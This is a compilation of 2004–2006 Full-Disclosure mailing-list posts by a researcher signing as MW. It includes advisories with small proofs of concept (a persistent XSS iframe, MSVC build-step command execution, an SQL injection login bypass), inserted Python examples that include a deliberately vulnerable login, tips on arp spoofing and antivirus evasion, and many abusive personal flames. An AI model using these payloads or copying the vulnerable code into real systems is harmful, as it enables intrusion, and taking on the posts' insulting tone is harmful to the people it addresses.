Now, being one that just has to back up my security product research, I uninstalled your product to compare my computer use and Internet browsing without your Product's protection. After a reboot I see now that my HTML icons are back with that blue e, not that BIG GREEN SQUARE THINGIE (an obvious sign of not being protected), although I can actually open them now, as well Internet Explorer itself now opens (I think I'm at risk now huh?)

In my opinion this Product is effective, or not, depending on your Marketing stance and spamming of security lists touting a questionable product that offers nothing that I can see of value.

cheers,
MW
[Full-disclosure] ASPListPics
- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 -
- ASPListpics -

RETRO-RELEASE DATE:
===================
Nov 11, 2004

Duplicate Release: June 06, 2006 by: r0t
http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html
http://secunia.com/advisories/20517/

OVERVIEW
========
ASPListpics is a highly configurable ASP application that automatically generates fast thumbnail web indexes of images in a folder structure.

AFFECTED PRODUCTS
=================
ASPListpics 4.x
http://www.iisworks.com

DETAILS
=======
1. XSS (persistent)

PROOF OF CONCEPT LINKS AND RETRO-POC
====================================
1. XSS (Cross Site Scripting)

There is persistent XSS inclusion in the comments feature of ASPListpics in the following:
field name
field comment

By embedding various types of XSS into the comment section, we are able to render javascript in the user's browser.

below is a simple PoC (Proof of Concept)
enter malicious script into the comments section.

comment: ohno<iframe src=http://whatismyip.com></iframe>ouch

and is rendered as:
HTTP://[VULNERABLEHOST]/listpics/listpics.asp?a=rate&ID=[PICID]&Info=[SCRIPTING HERE]9000|0

CREDITS
=======
r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html

RETRO-CREDITS
=============
This vulnerability was discovered and researched by Donnie Werner of exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or patches available.

Retro-Advisories are released when either the same research is released by a 3rd party, old private research that is no longer active, or the product has been patched due to vendor updates before a formal Exploitlabs advisory was released to the public.

Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]
--
web: http://exploitlabs.com
Re: [Full-disclosure] **LosseChange::Debunk it??**
Pentagon Crash Footage released today
http://www.judicialwatch.org/flight77.shtml
Re: [Full-disclosure] **LosseChange::Debunk it??**
the only fact worth investigating in this is the sales of stocks leading up to 911.

viewed from a technical standpoint on the pentagon attack and the towers collapse... well this is just pure bullshit. anyone with basic physics and any amount of aviation experience can see the author is absolutely clueless in regards to these technical points.

my2bits,
MW
Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability
Your blog seems to suggest that you are also quite severely mistaken in regard to my identity.

> Secunia did not notify Microsoft ahead of time in order to allow for them to patch it before it became public.
> [...]
> Microsoft chided Zalewski [from Secunia] for jumping the gun and posting his findings before a comprehensive patch could be created, but the researcher is unapologetic.

But that's for you to figure out what's wrong in that picture. I will take a shot in the dark here... you do not work for Secunia.

and yes... bad blogging is far worse than any 0day, it does nothing but provide inaccurate information, hysteria and FUD.

Tim... next time you decide to try to write a comprehensive blog entry, do some research first. (and stop relying on the footer to try to decipher who someone is or not) Secunia sponsors the FD list, and is not the releasing entity in this case.

DAMN THE BLOGGERS!!!

cheers,
MW
Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux
> Game's up, n3td3v. You can quit hiding behind your fake Yahoo account now. Go away kid, before you hurt somebody.

owned!
Re: [Full-disclosure] Secunia illegal spam and advisory republication
> When you subscribe at grok.org.uk, you are not made aware that Secunia is affiliated with the mailing list and fails to warn users that a Secunia URL will be placed at the bottom of a user or company disclosure.

what you fail to see is... we don't care.

Further, any information a researcher discloses in public is just that, public. Since you are hellbent on leather here... your oh so loved Securityfocus / Bugtraq does the same thing. Many of my own advisories are put on Bugtraq without me submitting directly. I guess http://www.osvdb.org is just as guilty? Perhaps Milw0rm too?

You are mad because you have never once had any information disseminated by any security site. why? Cuz you don't do any research, find vulns, write exploits or have disclosed anything worthy of publication. Further, because of your continued drunken rants, lack of professionalism and just plain stupidity you never will be a player in the security industry. You fail to see that these faults are yours, and yours alone.

As I have said before... get sober, stfu and get a real life. We here (and the big media you are so desperately trying to attract) don't give a rat's ass about you, your drunken megalomaniacal disposition, or anything you do... PERIOD.

stfu kthnx bai,
MW
Re: [Full-disclosure] Secunia illegal spam and advisory republication
> No, Milw0rm tells you who discovered the vulnerability, as do other sites. Although Secunia tell you it was all their work. I bet you would be pretty pissed if you post one of your XSS or SQL injection, and it appears on the Secunia website the next day saying Secunia FOUND.

WRONG WRONG WRONG

you can't even back up your rant with facts can you?
http://secunia.com/search/?search=Donnie+Werner

THANKS FOR PLAYING !!!
Re: [Full-disclosure] Secunia illegal spam and advisory republication
> You think? I have setup a webpage to tell you what I think of you and everyone else. http://geocities.com/n3td3v who doubts me. One time I added you to Yahoo Messenger thinking you were a friend but you just walk all over me like everyone else. Screw you man

that's right, YOU added me (i never was your friend) and I tried to warn you about yourself, your drunkenness, and your skewed outlook on life. I think it's funny after I showed you were wrong about Secunia, you now go off on some other rant and roll. (drop some more eX ok). Instead you point to some extremely idiotic page that itself shows just how lame you are, your delusions of grandeur and the fact that you just plain suck. Stop thinking people are your friends, and actually try to find a friend (if they can put up with your paranoid drunk ass that is)

> You say you're someone elite, but all you've done is XSS and SQL injection (copy and paste hacking). Anyway, read the webpage hotshot.

I may not have produced the most ground breaking exploits and vulns, but I have something you will never attain, and that is RESPECT. I seriously suggest attacking someone who can't think for themselves, doesn't have a clue, and is within your own peer group (preschool - kindergarten)

cheers,
MW
Re: [Full-disclosure] Secunia illegal spam and advisory republication
> Correction: You have never attained respect from anyone.

since you are a bantown troll, I will just disregard you

bai
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
> Yahoo! Mail once in a while will ask you to re login again so it's not so abnormal.

I use Yahoo Mail, I have never once had to re-login in 4 years.

dunno...
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
exploit creates a frameset and redirects to http://w00tynetwork.com/x/, it's interesting that it then redirects to http://211.22.14.50/.yahoomail/x.htm and spoofs a Yahoo login page. upon entering credentials, the site redirects back to http://mail.yahoo.com so it simply looks like a bad login.

211.22.14.50 = www.gbigift.com.tw

cheers,
mw
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
reflecting on this...

the offending url you give is http://w00tynetwork.com/x/ which contains a fake yahoo login (for webmail) ((and other exploits embedded within the site))

you state this is a Yahoo Email vulnerability. stop me if im wrong... why would anyone be vulnerable to a Yahoo login redirect phish, if in fact they are already logged in to read the mail in the first place.

i can appreciate the possibility of XSS within the Yahoo webmail interface, just not with this particular redirect code (or site url) you provide. XSS could be more effectively used to leverage a browser exploit, rather than (trying to) steal your credentials ala phishing

2cents,
MW
Re: [Full-disclosure] Industry calls on Microsoft to scrap Patch Tuesday for Critical flaws
- Original Message -
From: n3td3v [EMAIL PROTECTED]

> The problem here is, many of the n3td3v bashers are secretly blackhat trolls (like morning wood etc) and don't add to the discussion of eEye and others

ex-fucking-scuse me?

grow up you drunk idiot.
Re: [Full-disclosure] Industry calls on Microsoft to scrap Patch Tuesday for Critical flaws
> Sorry to say the n3td3v group

more like "Sorry to say n3td3v group does not exist" (kinda like your brain)

umm, there is no n3td3v group so please stop using that phrase, you're just trying to make yourself look big and professional to the media / vendor personage that reads this list.

> .. and that you have a group of rogue employees

(trying to make like there are bonafide sec researchers working for your group) [ insert much lmfao here ]

n3td3v... you are chum, bait, food, just waiting to be extruded out of some orifice like the smelly nasty mess you are.

NOW PLZ STFU KTHNX
Re: [Full-disclosure] Re: Arin.net XSS
same issue that internic had a few years ago..
http://lists.grok.org.uk/pipermail/full-disclosure/2003-May/005092.html

cheers
Re: [Full-disclosure] Filemaker Pro 7 - any known exploits/hacks available?
- Original Message -
From: Knud Erik Højgaard [EMAIL PROTECTED]

> Pay me for an audit (I will find a bug and give you ammo to say NO), or hire a(n expensive) company like corest/ilja,suresec(not expensive)/eeye/lsd.pl/immunitysec(hi dave)/phenoelit(hi FX) to do the same. I am probably cheaper, they are probably(yeah right, they certainly are) better.
> --
> Knud

hard up for 0days are ya Kokanin?
Re: [Full-disclosure] MBT Xss vulnerability
in all honesty, XSS is a serious vector of attack. however, non-persistent XSS is a much less serious problem than is persistent XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistent nature of the flaw at one dedicated site.

Issues come into play via persistent XSS, which is script that may be embedded in a web application, such as a guestbook, or comment section, where people would travel to on their own without the need of a direct link and then rendered upon visitation in the user's browser.

Further, in today's world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained... and is often of minor importance... and information. What is bad is leveraging XSS as a vector for browser exploitation (can we say IFRAME+WMF), so you have a way, via XSS, to COMPROMISE end users' systems.

While the OP does have a valid initial point and theory,
1. it is not persistent in nature
2. it is one site, and not a script used on many sites
3. it does require SE at some level to be effective
4. it should not have been posted to FD (see points 1,2,3)

my2bits,
MW
Re: [Full-disclosure] Security Bug in MSVC
> What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it.

again... this does not exploit the source code. it does exploit the build files. if i was simply compiling badprog.c then launching it, that would be stupid. i am leveraging the project files, not the source code.

MW
Re: [Full-disclosure] Security Bug in MSVC
> In all this, I am discounting the fact that if someone is building untrusted sources, (s)he is most likely going to run the untrusted program afterwards.

this does not run an untrusted program. if you noted, I named it a feature bug and my poc is a simple hello world sample. Judging from MS's extensive information to me, direct from MSRC, this is an issue. remote code can be pulled in and executed without any notice or warning to the user. I am not leveraging directives for CPP (cc is the Makefile equiv). MSVC tends to hide (especially these actions) from the end user.

cheers,
Donnie
Re: [Full-disclosure] PC Firewall Choices
> I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines.

not to plug a product, but http://force.coresecurity.com/

I have received many kudos after recommending this to several people.

my2bits,
MW
[Full-disclosure] Security Bug in MSVC
- EXPL-A-2006-002 exploitlabs.com Advisory 048 -
- MSVC 6.0 run file bug -

AFFECTED PRODUCTS
=================
Microsoft Visual Studio 6.0
http://microsoft.com

Possibly other products referenced in:
http://support.microsoft.com/kb/841189

OVERVIEW
========
Source code project distributions are very popular these days. Generally authors offer code as a project with source, headers, and msvc project files if it is a fairly big project. Most users will simply open up the project.dsw file (especially if it says to do so in a readme.txt or other compiler instructions), which in turn loads the project.dsp files, which provide the compiler directives. A malicious attacker could embed commands to be executed in the project files, and execute any local code of his choosing.

note: this is an implemented feature in MSVC, and should be considered a bug, not a vulnerability.

IMPACT
======
The impact of this is quite severe, as it is possible to script commands such as to launch ftp, retrieve and execute a file from a remote location.

DETAILS
=======
By modifying the .dsp files:

project settings
  custom build
    Commands: command to execute
  Post-build Step: command to execute

1.a
InputPath=.\Release\hello.exe
SOURCE=$(InputPath)

hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR)
	calc

1.b
PostBuild_Cmds=notepad.exe

POC
===
http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip

extract, and open hello.dsw
click batch build, build or rebuild all
code will execute (calc.exe and notepad.exe used as an example)

calc.exe = Custom-Build
notepad.exe = PostBuild Commands

SOLUTION
========
vendor contact: [EMAIL PROTECTED] Sept 20, 2005
http://support.microsoft.com/kb/841189 updated Jan 6, 2006

Microsoft provided these URLs as well:
http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp
http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx

SUGGESTED PATCH
===============
Include a dialog box that warns the user, before pre and post build directives can be launched, if execute directives are present in the build project files.

CREDITS
=======
This vulnerability was discovered and researched by Donnie Werner of exploitlabs

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://exploitlabs.com/files/advisories/EXPL-A-2006-002-msvc-featurebug.txt
http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip
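The advisory's suggested patch amounts to showing the user every build-step command before the IDE runs it. As an added example (not the advisory's PoC and not Microsoft's code), here is a Python pre-open scanner that does that for .dsp files on disk; it assumes the VC6 "# Begin Custom Build" / "# End Custom Build" markers and the PreLink_Cmds= / PostBuild_Cmds= keys, which the advisory only partly quotes.

```python
"""Pre-open scanner for MSVC 6.0 .dsp project files.

Added example, not the advisory's PoC or Microsoft's code: it lists every
command a .dsp would run as a custom build step, pre-link step or post-build
step, so a project fetched from an untrusted source can be reviewed before
the IDE builds it. Assumptions about the file format beyond what the
advisory quotes: custom build steps sit between "# Begin Custom Build" and
"# End Custom Build", their commands are the indented lines after the
'target : $(SOURCE) ...' rule, and pre-link/post-build steps are stored as
PreLink_Cmds= / PostBuild_Cmds= lines (several commands joined by tabs).
"""
import re
import sys
from pathlib import Path

# Keys whose value the IDE hands to the shell after linking / building.
COMMAND_KEYS = ("PreLink_Cmds", "PostBuild_Cmds")
# The rule line that opens a custom build recipe, with or without quotes.
RULE_RE = re.compile(r'^"?[^"\s]+"?\s*:\s*\$\(SOURCE\)')

# Constructed sample modelled on the advisory's PoC (calc + notepad.exe).
SAMPLE_DSP = """\
# Microsoft Developer Studio Project File - Name="hello" - Package Owner=<4>
# Begin Target
# Name "hello - Win32 Release"
# Begin Special Build Tool
SOURCE=$(InputPath)
PostBuild_Cmds=notepad.exe
# End Special Build Tool
# Begin Source File
SOURCE=.\\hello.c
# Begin Custom Build
InputPath=.\\Release\\hello.exe
SOURCE=$(InputPath)

hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR)
\tcalc

# End Custom Build
# End Source File
# End Target
"""


def find_build_commands(dsp_text):
    """Return a list of (kind, line_no, command) for every command found."""
    findings = []
    in_custom = False   # inside a "# Begin Custom Build" block
    in_recipe = False   # past the rule line, collecting its command lines
    for line_no, raw in enumerate(dsp_text.splitlines(), 1):
        line = raw.rstrip()
        if line.startswith("# Begin Custom Build"):
            in_custom, in_recipe = True, False
            continue
        if line.startswith("# End Custom Build"):
            in_custom, in_recipe = False, False
            continue
        stripped = line.strip()
        for key in COMMAND_KEYS:
            if stripped.startswith(key + "="):
                # Multi-command steps are stored tab-separated (assumption).
                for cmd in stripped.split("=", 1)[1].split("\t"):
                    if cmd.strip():
                        findings.append((key, line_no, cmd.strip()))
        if not in_custom:
            continue
        if RULE_RE.match(line):
            in_recipe = True
        elif in_recipe and stripped and line[0] in " \t":
            findings.append(("CustomBuild", line_no, stripped))
        elif in_recipe and not stripped:
            in_recipe = False   # a blank line ends the recipe


    return findings


def scan_file(path):
    """Scan one .dsp on disk; returns the same tuples as find_build_commands."""
    return find_build_commands(Path(path).read_text(errors="replace"))


if __name__ == "__main__":
    if sys.argv[1:]:
        hits = [(p, *f) for p in sys.argv[1:] for f in scan_file(p)]
    else:
        hits = [("<sample>", *f) for f in find_build_commands(SAMPLE_DSP)]
    for path, kind, line_no, cmd in hits:
        print(f"{path}:{line_no}: {kind}: {cmd}")
    # Non-zero exit so a wrapper script can refuse to open a flagged project.
    sys.exit(1 if hits else 0)
```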
[Full-disclosure] AspTopSites SQL injection
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
- AspTopSites -

AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp

OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server and uses Active Server Pages with a MS Access 2000 database. Simply upload AspTopSites®, make one configuration setting and you're ready to start running your own TopSites traffic generator. AspTopSites® comes with full source code... no encoding or DLLs need to be installed on the server.

DETAILS
=======
1. SQL Injection
AspTopSites does not filter SQL, resulting in full access to the user manager menu.

POC
===
1.
entering an SQL Injection type statement in the password field causes the statement to be true.

http://[host]/topsites/default.asp --- view listings
http://[host]/topsites/goto.asp?id=43 --- mouseover id value
http://[host]/topsites/includeloginuser.asp --- login here
user: [ id value ]
password: 'or'

note: Vendor Demo Site is Vuln

SOLUTION:
=========
vendor contact:
Jan 3, 2006 [EMAIL PROTECTED] (no resp)
Jan 10, 2006 (no resp = release)

Credits
=======
This vulnerability was discovered and researched by Donnie Werner of exploitlabs

Donnie Werner
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
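The defect behind the advisory is a login query assembled by string concatenation. As an added example (not the product's ASP code), here is a Python/SQLite stand-in showing that pattern next to the parameterised fix; the table and column names and the sample user row are constructed, and the injected password is a variant of the advisory's 'or' payload chosen so that it also evaluates true under SQLite.

```python
"""Login lookup with AspTopSites-style string concatenation beside a
parameterised version.

Added example, not the product's ASP code. An in-memory SQLite table stands
in for the Access database the advisory describes; the table/column names and
the member row are constructed assumptions. The injected password is a
variant of the advisory's 'or' payload that evaluates true in SQLite, and it
exercises the same concatenation defect.
"""
import sqlite3


def make_db():
    """Constructed stand-in for the member table (id 43 as in the advisory URL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO members VALUES (43, 'constructed-secret')")
    return con


def login_vulnerable(con, user_id, password):
    """The flawed pattern: user input is pasted straight into the SQL text.

    With password = "' OR ''='" the statement becomes
        ... WHERE id=43 AND password='' OR ''=''
    and since AND binds tighter than OR, every row satisfies it.
    """
    sql = ("SELECT id FROM members WHERE id=" + user_id
           + " AND password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_fixed(con, user_id, password):
    """The fix: validate the id and bind both values as parameters.

    Bound parameters travel as data and are never parsed as SQL, so quote
    characters in the password cannot change the query's structure.
    """
    if not user_id.isdigit():          # the id field must be a number
        return False
    sql = "SELECT id FROM members WHERE id=? AND password=?"
    return con.execute(sql, (int(user_id), password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR ''='"
    print("vulnerable, injected password:", login_vulnerable(db, "43", payload))
    print("fixed, injected password:     ", login_fixed(db, "43", payload))
    print("fixed, real password:         ", login_fixed(db, "43", "constructed-secret"))
```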
Re: [Full-disclosure] How to Determine My System Vulnerabilities
> I know I feel like the Federal Reserve is safe now.

well..., the headers appear to be genuine

IS THIS FOR F*CKING REAL

The director for IT of the FDRB of Minneapolis is asking the most basic question possible.

ARE YOU SERIOUS?!?!?

> I have three servers running Linux Red Hat OS. I would like to find a source for information regarding How Too when it comes to determining what level of kernel, SSH, PHP, etc. my servers are running. I do know how to check some of these things but am looking for someone who is very knowledgeable and is willing to answer questions about this OS.

HOW DID YOU EVEN GET THE JOB??? I BET YOU TOOK A TEST AND HAVE SOME BIG FANCY LETTERS

*sigh* this ignat is making what? 75-125k$ / yr and doesn't know how to get versions from his daemons?!?!

wtf wtf wtf omg omg omg

*shocked and awed*

/me falls over
Re: [Full-disclosure] Re: SecurID with Active Directory ?
> [If, for instance, you really need to completely eliminate access via passwords, you could use some programmatic method (i.e., Visual Basic) to set your users' Windows passwords to very long, random passwords that never expire. The password change would be captured on the DC and sent to the ACE/Server. The long, random passwords would then be provided with each authentication (and recovered when offline), but the

I believe you are meaning a custom VB login.exe at every user station?

> users will never know their Windows password.

unless of course they take the time to look in the custom vb login.exe application, where the user/pass is stored in clear text. This would also be a point of attack if the exe were ever to escape outside infrastructure controls.

(I bring this up as this exact vector was used successfully in a pentest: the exe asked for a user/pass, the application then allowed access to the ftp server and its credentials were stored cleartext in the exe. The developer believed he could hide the actual ftp process from the end user so they did not need to set up user accounts on the ftp server, and used the exe to validate against an asp server, thus allowing the application to validate and run.)

although not quite the scenario you describe, i believe the implications would be the same.

of course, I could be completely off base

MW
Re: [Full-disclosure] Re: what we REALLY learned from WMF
I do know that MS prefers to do extensive testing on patches. ms04-015, i was told, had to go through over 200 differing infrastructure / product / implementation testings before release. i am sure some of these tests are done for large corps to ensure no breakage across a multitude of architectures, etc. A patch may work properly on 99% of everything, but it's that 1% they focus on before formal release. (esp if that is a large enterprise)

my2bits,
MW
Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security
> everyone knows the best official patch is firefox

umm, no. firefox presents a save or open dialog box. if the user believes it to be an image he / she is intended to view, they will simply open. thus, windows gladly passes the extension handler to WMF, game over. or, they will save, and simply passing the mouse over the icon will trigger the exploit, again... game over
Re: [Full-disclosure] Trojan found on Linux server
> Yep, when running strings on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.)

64.239.9.236 = copticpope.tv
http://64.239.9.236/
http://copticpope.tv

heh?
Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWS Post Data
Gaurav, go back to using Cain to spy on your co-workers for your corrupt boss.

and btw, you don't hack servers then go to the company to ask for a tender to provide security services ( it's called blackmail, but I guess that's pretty common in Hyderabad ).

Have a nice life backstabber!

cheers,
MW
Re: [Full-disclosure] XSS vulnerabilities in Google.com
i see no "n3td3v" credits here...

further, i can't conceive of the fact that you would even know what UTF-7 encoding is. IMO all you have ever done is notice weird behavior when info is pulled into your Google group ( like your 1st post about google groups about 9 months ago or so ) from other sources ( or replies ).

XSS can be bad or benign depending on if it is persistent in nature or not ( if not it requires a user to click a preformed XSS url ). And yes, persistent XSS can be used to root users if coupled with the latest browser exploit ( and any admin behind the site's firewall / corporate infrastructure ).

In the future may I suggest the following
1. find your flaw
2. write an advisory
3. send it to the vendor
4. wait for response
5. wait for patches
6. disclose advisory formally
7. stfu and find your next flaw

cheers,
mw

> //= Security Advisory =//
> - XSS vulnerabilities in Google.com -
> --[ Author: Yair Amit , Watchfire Corporation http://www.watchfire.com
> --[ Discovery Date: 15/11/2005
> --[ Initial Vendor Response: 15/11/2005
> --[ Issue solved: 01/12/2005
> --[ Website: www.google.com
> --[ Severity: High
Re: [Full-disclosure] BANTOWN PRESENTS: Give me 0day or give me death
troll go home
http://www.encyclopediadramatica.com/index.php/Bantown

i think we can all see the seriousness of this OP ( not )

and next time... tell your cronies IP-Relay phone is traceable, not to mention against the law to make harassing calls over its service

happy holidays ( i bet your bbq sauce is frozen about this time of the year )

mw
Re: [Full-disclosure] [scip_Advisory] NetGear RP114 Flooding Denial of Service
dunno, but i know this has been an issue since the rt314 product ( 1999-2000? )

a simple nmap -sS target triggers it external, and no surprise internal as well. ( not fun running pentests behind one of these babies )

i don't know if you noticed that existing connections don't appear to be affected ( IM and streaming traffic ) but dns generally gets hosed.

my2bits,
Donnie Werner
http://exploitlabs.com
Re: [Full-disclosure] Fuzzing testing webapp?
> I want to do something like this with a script, tool etc, (Looking fuzzing directory traversal )
> http://target/any.asp?data=.../.../.../ - where the variable data= -- this i want to test to find some bugs
> http://target/cgi-bin/any.cgi?data=var1var2;

efuzz is good in windows, and has exactly what you want ( although you can only fuzz one var )
http://www.priestmaster.org/projects/tools/efuzz.zip
( i have found stack overflows with this )

others are avail, such as Peach and Fuzzy, but are python based ( and work quite well )

the secret Google search string is:
http://www.google.com/search?hl=en&q=fuzzer

cheers,
mw
Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut (out now on DVD)
> When you're able to ask an employee at a major dot-com to implement http://security.yahoo.com and they do it, come back to me.

you're fucking serious?

http://security.yahoo.com/ --- basic security info. no major dot-com is stupid enough to NOT follow those recommendations, not to mention it is consumer level advice ( and common sense ).

You have seriously outdone yourself here, and blown your cover of being a real security researcher. Please take your drunk, UK megalomaniacal ass and go put a broom in it. ( or just STFU )

unless you can present your formal advisories ( since the flaws are patched, there is no disclosure worry ) to this list, anything you say is hearsay, and thus not believed.

sooo next time you save us all from death of the interweb, please be kind enough to back it up with some actual facts so we all can thank you, and realize just how lucky we are to have you in our hearts ( and search engines ).

the interweb thanks you,
mw
Re: [Full-disclosure] Re: Google is vulnerable from XSS attack
> As an owner of a Google Group, I would personally like this patched for the security of my group and that of my personal computer and web browser.

hmm... did you pay for this group? didn't think so
read the eula? bet not
who owns you? hint: Google ( they own the world )
Re: [Full-disclosure] Fwd: Report to Recipient(s)
> Only those with broken AV software, since that line is not the EICAR test string, according to the definition of the EICAR test string. As many have pointed out, I realize it's supposed to be an attachment : http://www.eicar.org/anti_virus_test_file.htm

you would be surprised at all the infected returns this generated when sent
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0919.html
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0923.html

( note the : This was a text only message with NAMES only. )
Re: [Full-disclosure] Paypal phishing attempt
> Someone with more time than me please report the following scam:
> http://210.202.161.99/us/Account_verification/webscr-cmd=_login/

for sites outside the usa, it is futile to contact ebay about every site. the best thing is to contact the offending server / hosting / isp
Re: [OTO-54919]: Re: [Full-disclosure] Paypal phishing attempt]
> Wtf? I wasn't aware I needed a ticket created ... is everyone else getting these?

yes, I think it is tied to an autoresponse email account here on the list ( and very stupid IMHO )
Re: [Full-Disclosure] Return of the Phrack High Council
oops?

Database error: pconnect(209.173.128.195, snappoll, $Password) failed.
MySQL Error: ()
Session halted.

http://snappoll.com/poll/50150.php
Re: [Full-Disclosure] Return of the Phrack High Council
hmm, second time vote worked... but um

http://www.snappoll.com/view_results.php?poll_id='50150

Database error: Invalid SQL: SELECT * FROM polls WHERE poll_id='50150
MySQL Error: 1064 (You have an error in your SQL syntax near ''50150' at line 1)
Session halted.

eek
Re: [Full-disclosure] How do you sniff your LAN subnet in nowdays switched networks ?
> If you have access to a machine connected to the switch you could try arp-spoofing ( http://en.wikipedia.org/wiki/ARP_spoofing ) and redirect traffic to this machine and sniff it there.
> More Info:
> http://wiki.ethereal.com/CaptureSetup/Ethernet?action=show
> http://su2.info/doc/arpspoof.php

he might be running Windows. get cain http://oxid.it
arp spoof then sniff while you're routing packets

cheers
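The defensive counterpart to the thread above is spotting ARP poisoning on the wire: an IP whose announced MAC suddenly changes, or one MAC answering for both the gateway and a victim. The following is an added example, not code from the post or from Cain/arpspoof; the log format it parses (`<seconds> reply <ip> is-at <mac>`) and the sample lines are constructed for the example.

```python
"""Detect ARP cache poisoning symptoms in a constructed ARP-reply log.

Added example, not code from the original post.  The log format is
constructed for this example (it is not tcpdump or Cain output):
    <seconds> reply <ip> is-at <mac>
"""
from collections import defaultdict

# Constructed sample: gateway 10.0.0.1 is first announced by aa:..:01,
# then a second host starts answering for it (and for 10.0.0.7) with
# a different MAC, which is what a man-in-the-middle looks like.
SAMPLE_ARP_LOG = """\
1 reply 10.0.0.1 is-at aa:bb:cc:00:00:01
2 reply 10.0.0.7 is-at aa:bb:cc:00:00:07
3 reply 10.0.0.1 is-at aa:bb:cc:00:00:01
4 reply 10.0.0.1 is-at de:ad:be:ef:00:99
5 reply 10.0.0.7 is-at de:ad:be:ef:00:99
6 reply 10.0.0.1 is-at de:ad:be:ef:00:99
"""


def parse_arp_log(text):
    """Yield (time, ip, mac) tuples, skipping lines that do not parse."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[1] == "reply" and parts[3] == "is-at":
            yield int(parts[0]), parts[2], parts[4].lower()


def find_arp_conflicts(text, trusted=None):
    """Return alerts for IPs whose announced MAC changes, or whose MAC
    differs from a trusted static mapping {ip: mac} (e.g. the gateway).

    Each alert is (time, ip, expected_mac, seen_mac).  Trusted entries
    are never overwritten, so every spoofed reply for them is reported.
    """
    trusted = {k: v.lower() for k, v in (trusted or {}).items()}
    seen = dict(trusted)
    alerts = []
    for t, ip, mac in parse_arp_log(text):
        prev = seen.get(ip)
        if prev is not None and prev != mac:
            alerts.append((t, ip, prev, mac))
        if ip not in trusted:
            seen[ip] = mac
    return alerts


def macs_claiming_multiple_ips(text):
    """A MAC answering for several IPs is typical of a host spoofing both
    the gateway and a victim.  Return {mac: sorted list of ips}."""
    ips = defaultdict(set)
    for _, ip, mac in parse_arp_log(text):
        ips[mac].add(ip)
    return {m: sorted(s) for m, s in ips.items() if len(s) > 1}


if __name__ == "__main__":
    for alert in find_arp_conflicts(SAMPLE_ARP_LOG,
                                    trusted={"10.0.0.1": "aa:bb:cc:00:00:01"}):
        print("ALERT t=%d %s was %s now %s" % alert)
    print(macs_claiming_multiple_ips(SAMPLE_ARP_LOG))
```

Without a trusted mapping the detector only reports the moment a binding flips; with the gateway pinned it reports every reply that disagrees, which is what a static ARP entry (or a switch with dynamic ARP inspection) enforces for you.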
Re: [Full-disclosure] Hacking Boot camps!
Interesting about the Intense thing... ( sorry for your loss )

> Blackhat training camps sound pretty good and some of the people are pretty damn skilled, but these others Zone-H, Vigilante and the likes I would avoid. blind leading the blind if you ask me.

I don't know about the others, but i do know Zone-h Hands on Hacking 2 day seminars are worth it, have actual hands on hacking labs, and are quite informative. ( and don't claim to be blackhat style training, nor a CEH prep class ) While not targeted for the security professional, they are an excellent way for lower level admins, developers, corporate IT, and others that are not security savvy to learn about real-world attacks and mitigation.

mw
Re: [Full-disclosure] another filename bypass vulnerability - from cmd.exe
I think the OP was getting at this being an AV bypass vector for worms and other malware that can interact with cmd.exe. Theory being that AV will scan by extension ( malware.exe vs malware.ext ) and thus evade detection but yet be executable.

In light, informal testing this appears to be a realistic scenario that provides yet another vector for AV bypass. On test systems, c:\malware.exe.txt runs the malware.exe, and does not open notepad. ( cmd.exe parses the file header, explorer.exe uses .extension )

my2bits,
MW
Re: [Full-disclosure] FAO Mark Murtagh from Websense
> And your blatant attempt to turn Morning Wood against me in public was just pathetic.

funny... as I replied first.

I suggest you back up, sit down, and stfu.

kthnx,
mw
Re: [Full-disclosure] FAO Mark Murtagh from Websense
> Here's what Mark Murtagh had to say
> http://www.biosmagazine.co.uk/op.php?id=314\
> Maybe another ten minutes of your life wasted ;-)

